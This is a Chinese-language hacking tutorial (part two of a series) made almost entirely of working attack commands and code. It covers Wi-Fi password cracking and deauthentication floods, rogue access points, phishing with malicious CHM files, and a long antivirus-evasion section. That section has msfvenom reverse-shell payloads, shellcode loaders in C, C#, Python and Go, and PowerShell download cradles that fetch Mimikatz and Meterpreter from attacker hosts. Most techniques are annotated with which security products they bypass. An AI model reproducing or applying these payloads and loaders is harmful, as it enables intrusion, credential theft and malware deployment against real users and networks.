| 站内公告: |
时间:2021-01-15 点击:0 次 来源:管理员 作者:小乐 - 小 + 大
|
黑客怎么入侵网站之讲解黑客入侵技巧及方法(二)
近源攻击 WI-FI破解 wifite Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill #airmon-ng start wlan1 安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本 #apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #git clone https://github.com/ZerBea/hcxtools #cd hcxtools #make #make install #git clone https://github.com/ZerBea/hcxdumptool #cd hcxdumptool #make #make install #wifite –-dict /root/Desktop/wordlist.txt 加载 Aircrack-ng #airmon-ng start wlan0 开启监听模式 #airodump-ng wlan0mon 查看数据包 #airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包 #aireplay-ng –deauth 10 –a APmac wlan0mon deauth攻击 #aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth攻击某个设备直至获取handshake(握手包) #airmon-ng stop wlan0mon 关闭监听模式 #aircrack-ng –w wordlist.txt name.cap 指定字典破解密码 钓鱼网络 Hostapd  #apt install hostapd dnsmasq #cd /etc/hostapd #vim open.conf 创建无加密热点 Interface=wlan1 Ssid=FreeWIFI Driver=nl80211 Channel=1 Hw_mode=g #vim /etc/dnsmasq.conf Dhcp-range=10.0.0.1, 10.0.0.255,12h Interface=wlan1 #systemctl restart dnsmasq 消除网卡限制 #nmcli radio wifi off #rfkill unblock wlan #ifconfig wlan1 10.0.0.1/24 #hostapd open.conf 嗅探 #sysctl –w net.ipv4.ip_forward=1 #iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE #bettercap –iface wlan1 #net.show #net.sniff on #driftnet –i wlan1 Hostapd-wpe #apt install hostapd-wpe #vim /etc/hostapd-wpe/hostapd-wpe.conf 配置interface=wlan1 Ssid= Channel= 证书修改 #cd /etc/hostapd-wpe/certs/ 文件ca.cnf server.cnf client.cnf 修改countrName stateOrProvinceName localityName ……. #rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* #make clean #./bootstrap #make install 执行创建热点 #hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf 获取到密码时使用asleep破解 #asleap –C Challenge值 –R response值 –W 字典文件 无线干扰 Beacon flood 需切换网卡为监听模式 #airmon-ng start wlan1 创建大量虚假热点Mdk3 mon0 b #mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500 Deauth flood 针对AP #airmon-ng start wlan1 #aireplay-ng –deauth 10 –a AP’s mac address mon0 针对AP内设备 #airmon-ng start wlan1 将网卡置为监听模式 #airodump-ng wlan1mon –bssid 目标ap的ssid #aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon 开始攻击 Mdk3 destruction 针对范围内 #mdk3 wlan1mon d 针对AP #airodump-ng wlan1mon #mdk3 wlan1mon a -a APmac 发起攻击 黑名单 #mdk3 wlan1mon d –c 信道 –b /blacklist.txt. #mdk3 wlan1mon b -n test -w -g -c 1 -s 200 WiFi芯片esp8266 Mdk4 #mdk4 wlan0mon d CVE-2018-4407 Scapy send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备 绕过mac地址认证 Ifconfig #ifconfig wlan1 down #ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx #ifconfig wlan1 up Macchanger #macchanger –m xx:xx:xx:xx:xx:xx wlan1 #macchanger –r wlan1 BadUSB 克隆卡 蓝牙 鱼叉式攻击 钓鱼邮件 假冒的内部域名 假冒的外部域名 近似域名 被黑账户 群发/特定发 虚构情景/恶意连接/恶意文件 CVE CVE-2017-11882 Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016 CVE-2017-0199 Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016,Vista SP2,Server 2008 SP2,Windows 7 SP1,Windows 8.1 CVE-2012-0158 Microsoft Office 2003 SP3、2007 SP2和SP3,以及2010 Gold和SP1;Office 2003 Web组件SP3;SQL Server 2000 SP4、2005 SP4和2008 SP2,SP3和R2; BizTalk Server 2002 SP1;Commerce Server 2002 SP4、2007 SP2和2009 Gold和R2; Visual FoxPro 8.0 SP1和9.0 SP2; 和Visual Basic 6.0 CVE-2017-0143 Microsoft Windows Vista SP2;Windows Server 2008 SP2和R2 SP1; Windows 7 SP1;Windows 8.1; Windows Server 2012 Gold和R2;Windows RT 8.1;Windows 10 Gold,1511和1607;以及 和Windows Server 2016 OFFICE文档/ PDF文件 可执行文件 文档文件的伪造 扩展名/图标 捆绑 宏 0day CHM 使用编译的HTML文件加载恶意代码。 使用EasyCHM对html进行编译,在html文件中插入恶意代码。 使用MSF生成powershell格式的web_delivery模块 使用Rundll32配合MyJSRAT实施运行无弹窗 image 把命令base编码避免特殊符号 image 执行语句编码后 >powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA== 通过JSRat执行powershell上线命令 https://github.com/Ridter/MyJSRat >python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==" image 访问http://ip/wtf复制利用语句到html文件后编译 image image 正常打开CHM文件,无弹窗上线。 image 钓鱼链接 URL跳转 结合恶意文档或程序 短URL 结合水坑攻击 相似域名 域名窃取 第三方服务鱼叉 通过社交软件建立关系,如男女朋友,师父徒弟,HR,寻求业务等进行钓鱼攻击 免杀 MSF免杀 nps_payload >python nps_payload.py正常生成 >msfconsole -r msbuild_nps.rc开启监听 >%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml >wmiexec.py 正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程 @echo off echo [*] Please Wait, preparing software .. C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml exit 编码器 >set EnableStageEncoding true >set stageencoder x86/fnstenv_mov 编码进行免杀 >set stageencodingfallback false & >msfvenom --list encoders列出编码器 c/c++源码免杀 >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c -i编码20次 MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe 指针执行 unsigned char buf[] = "shellcode"; #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口 main() { ( (void(*)(void))&buf)(); } 使用vc6.0组建编译后在靶机执行 image 当前过不了火绒,360动态静态可过 申请动态内存 #include #include #include #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口 unsigned char buf[] = "shellcode"; main() { char *Memory; Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, buf, sizeof(buf)); ((void(*)())Memory)(); } 嵌入汇编 #include #include #pragma comment(linker, "/section:.data,RWE") unsigned char shellcode[] =""; void main() { __asm { mov eax, offset shellcode jmp eax } } 强制类型转换 #include #include unsigned char buf[] =""; void main() { ((void(WINAPI*)(void))&buf)(); } 汇编花指令 #include #include #pragma comment(linker, "/section:.data,RWE") unsigned char shellcode[] =""; void main() { __asm { mov eax, offset shellcode _emit 0xFF _emit 0xE0 } } XOR加密 https://github.com/Arno0x/ShellcodeWrapper安装 生成raw格式木马 >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw image 加密 > python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor 生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行 image 远程线程注入 目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp image 生成项目 能成功上线,并开启calc进程 image image 加载器免杀 shellcode_launcher https://github.com/clinicallyinane/shellcode_launcher/ 生成payload(raw) >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw 加载器加载 >shellcode_launcher.exe -i shellcode.raw SSI加载 https://github.com/DimopoulosElias/SimpleShellcodeInjector 生成payload(c) >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c 执行 >cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g" image MSF监听 可使用minGW自行编译 >gcc SimpleShellcodeInjector.c -o xxx.exe 执行 >xxx.exe +生成的编码 c#源码免杀 直接编译 生成payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt MSF启动监听 Payload粘贴到位置 using System; using System.Runtime.InteropServices; namespace TCPMeterpreterProcess { class Program { static void Main(string[] args) { byte[] shellcode = new byte[] {payload here}; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); } } Visual studio创建C#.net framework控制台程序编译可过杀软 加密处理 生成payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt 粘贴payload后编译加密 using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography; using System.Text; using System.Threading.Tasks; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; namespace Payload_Encrypt_Maker { class Program { // 加密密钥,可以更改,加解密源码中保持KEY一致就行 static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 }; static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc }; static byte[] payload = { payload here }; // 替换成MSF生成的shellcode private static class Encryption_Class { public static string Encrypt(string key, string data) { Encoding unicode = Encoding.Unicode; return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data))); } public static byte[] Encrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .Select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.Select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } } static void Main(string[] args) { byte[] result = Encryption_Class.Encrypt(KEY, payload); int b = 0; for (int i = 0; i < result.Length; i++) { b++; if (i == result.Length + 1) { Console.Write(result[i].ToString()); } if (i != result.Length) { Console.Write(result[i].ToString() + ","); } } } } } image 编译解密 using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Runtime.InteropServices; using System.Threading; using System.Reflection; using System.Runtime.CompilerServices; namespace NativePayload_Reverse_tcp { public class Program { public static void Main() { Shellcode.Exec(); } } class Shellcode { public static void Exec() { string Payload_Encrypted; Payload_Encrypted = "payload here"; string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(','); byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length]; for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++) { byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString()); _X_to_Bytes[i] = current; } // 解密密钥,可以更改,加解密源码中保持KEY一致就行 byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 }; byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes); // 加载shellcode IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40); Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length); CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0); Thread.Sleep(2000); } public static byte[] Decrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .Select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.Select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); } } XOR/AES编码 与上文xor加密类似 CSC+InstallUtil 生成payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译 image C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs image 执行 C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe Python源码免杀 pyinstaller加载C代码编译 生成C格式payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c 粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe >python pyinstaller-script.py -F -w shellcode.py 会在目录下生成dist文件夹,exe文件就在里面 pyinstaller加载py代码编译(*) 生成py格式payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py 粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe >python pyinstaller-script.py --console --onefile shellcode.py 会在目录下生成dist文件夹,exe文件就在里面 image image image Py2exe打包exe 生成raw格式payload MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py 在32位系统上安装python、py2exe 创建setup.py放置同一目录 image from distutils.core import setup import py2exe setup( name = "Meter", description = "Python-based App", version = "1.0", console = ["shell.py"], options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}}, zipfile = None ) 执行打包命令 >python setup.py py2exe 会在当前目录生成dist文件夹,打包好的exe在里面 image Base64编码+Pyinstaller打包 MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe >msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c Shellcode粘贴在shellcode+base64+c.py中 >python pyinstaller-script.py -F -w shellcode.py 会在目录下生成dist文件夹,exe文件就在里面 加载器分离 hex 生成c格式payload >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c 下载k8final image 粘贴shellcode进去 image 使用 https://github.com/k8gege/scrun image 或 >python scrun.py xxx 或 编译ScRunHex.py为exe Base64(*) 生成c格式payload >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c 下载k8final image 粘贴shellcode进去 image 进行hex编码后,粘贴进去base64编码 image 看系统位数编译ScRunBase.py文件,使用pyinstaller打包为exe后执行 https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py >python pyinstaller-script.py -F -w ScRunBase64.py image image DLL劫持 白dll劫持 Processmonitor查找程序加载的dll 使用stud_pe加载dll进去 或 生成payload免杀好粘贴进去,查看目标上有什么软件,本地查找可劫持的dll,劫持好文件后传上去。 image MSBuild 链接 https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp 远程执行 >wmiexec.py 要设置自动迁移进程 image GreatSCT >use Bypass >list >use regasm/meterpreter/rev_tcp.py >msfconsole -r /usr/share/greatsct-output/handlers/payload.rc Mshta https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta 生成 >msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin >cat 1.bin |base64 -w 0 image 编码后的内容复制到 image 执行 >mshta http://192.168.0.106:1222/1.hta 360执行检测出来,静态动态无法检测、火绒无法检测 InstallUtil 内网文章中有介绍 Veil >use 1选择evasion模块 >list查看可用payload >use 7 选择c格式的payload >set LHOST/LPORT设置回连IP和端口 >generate生成 image 直接生成的exe可能会被查杀,目前可过360,不能过火绒 使用minGW-w64编译C文件 >gcc -o vel.exe veil.c -l ws2_32 RC4 >msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c 捆绑 >msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe -i 15 -f exe -o /var/www/html/payload4.exe  Evasion模块 >show evasion Phantom-Evasion image image Shellter 仅支持32位程序 >apt install shellter 指定一个exe文件 image 选择payload the-backdoor-factory 查看是否支持捆绑 >python backdoor.py -f /root/Desktop/putty.exe -S 查看此文件支持哪些payload >python backdoor.py -f /root/Desktop/putty.exe -s show reverse_shell_tcp_inline对应msf set payload windows/meterpreter/reverse_tcp meterpreter_reverse_https_threaded应msf set payload windows/meterpreter/reverse_https iat_reverse_tcp_stager_threaded修复IAT user_supplied_shellcode_threaded自定义payload 参数 -s 指定payload -H 回连地址 -P 回连端口 -J 多代码裂缝注入 >python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe 后门生成在backdoored目录 或 生成payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c 自定义 >python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe zirikatu image hanzoInjection https://github.com/P0cL4bs/hanzoInjection 生成 >msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin >HanzoInjection.exe -p 1.bin -o 1.cs 编译1.cs 属性-生成-允许不安全代码 PowerShell免杀 直接生成 >msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1 执行 >powershell -ep bypass -noexit -file 1.ps1 Powershell行为检测bypass >powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)" Invoke-Shellcode加载 生成code >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1 目标执行 > powershell -ep bypass > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1') > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1') > Invoke-Shellcode -Shellcode ($buf) -Force image image 防护软件没反应 Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation 生成code >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1 >powershell -ep bypass >Import-Module .\Invoke-Obfuscation.psd1 >Invoke-Obfuscation >set scriptpath C:\Users\y\Desktop\1.ps1 >encoding >3 指定编码方式 >out C:\Users\y\Desktop\ok.ps1 保存 image image 执行 >powershell -ep bypass -noexit -file ok.ps1 image image image Xencrypt https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1 >Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100 递归分层躲避动态查杀 image >Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1 image image PyFuscation https://github.com/CBHue/PyFuscation 对函数,参数,变量进行混淆 >python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1 image image 拆分+C编译 #include #include int main(){ system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)"); return 0; } 行为检测 >powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz" Out-EncryptedScript http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1 >Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456  image image PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1") PS > [String] $cmd = Get-Content .\evil.ps1 PS > Invoke-Expression $cmd PS > $decrypted = de shabiisme 123456 PS > Invoke-Expression $decrypted PS > Invoke-Mimikatz cobalt strike powershell免杀 From: https://y4er.com/post/cobalt-strike-powershell-bypass/ powershell>$string = '' powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[cs生成的shellcode]') powershell>$s |foreach { $string = $string + $_.ToString()+','} powershell>$string>c:\1.txt 修改ps脚本 [Byte[]]$var_code = [Byte[]](payload) 再混淆一下函数和变量 绕过执行命令的拦截 使用cs的参数欺骗 beacon > argue cmd.exe blablabla 分块免杀 生成 msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1 image 先来测试一下,把ps1文件的shellcode换成一段无害的字符串 image image 结果发现还是被查杀了 image 这表明大多数检测来自PowerShell模板,而不是Shellcode本身。 下面几种bypass方法 1.将字符串分成几部分并创建中间变量; 2.添加大量垃圾备注; 3.添加一些垃圾指令,例如循环或睡眠指令(对于沙盒有用)。 [DllImport("kernel32.dll")] 变为 [DllImport("ke"+"rne"+"l32.dll")] #可绕过赛门铁克 $przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) 变为 $magic="Syst"+"em"+".dll"; $przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location)) 分割shellcode $sc0= 一些细节可参照
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1 我不太懂汇编语言,所以没有添加无害指令。 这里直接使用一键生成的bash脚本,有时间的可以读读里面的命令 https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh 这个脚本是生成个hta的,脚本以1337个字符来分块 image 我测试的时候1337个字符会被赛门铁克查杀到,我这里修改成250个字符来分块 image 因为我没加汇编指令,中间这里直接按任意键跳过即可,懂的可以在开头添加一些指令,例如xor,inc,dec,add,sub,mov,nop等 image 执行完后会生成一些文件 image 我们只用final_pshnet_revhttps.ps1这个文件,打开修改一下 image 修改成 image image image Ruby 目标机器装有ruby时 生成 >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby 粘贴到ruby中 image 执行 >ruby xx.ruby Golang 生成 >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c 代码转换成0x格式,粘贴到go.txt中保存为go格式 image 安装golang环境在shellcode目录执行 >go build生成exe 加载器 go-shellcode https://github.com/brimstone/go-shellcode 进入cmd/sc目录编译sc.exe >go build image 生成 >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt 加载器加载shellcode >sc.exe shellcode image Gsl https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip 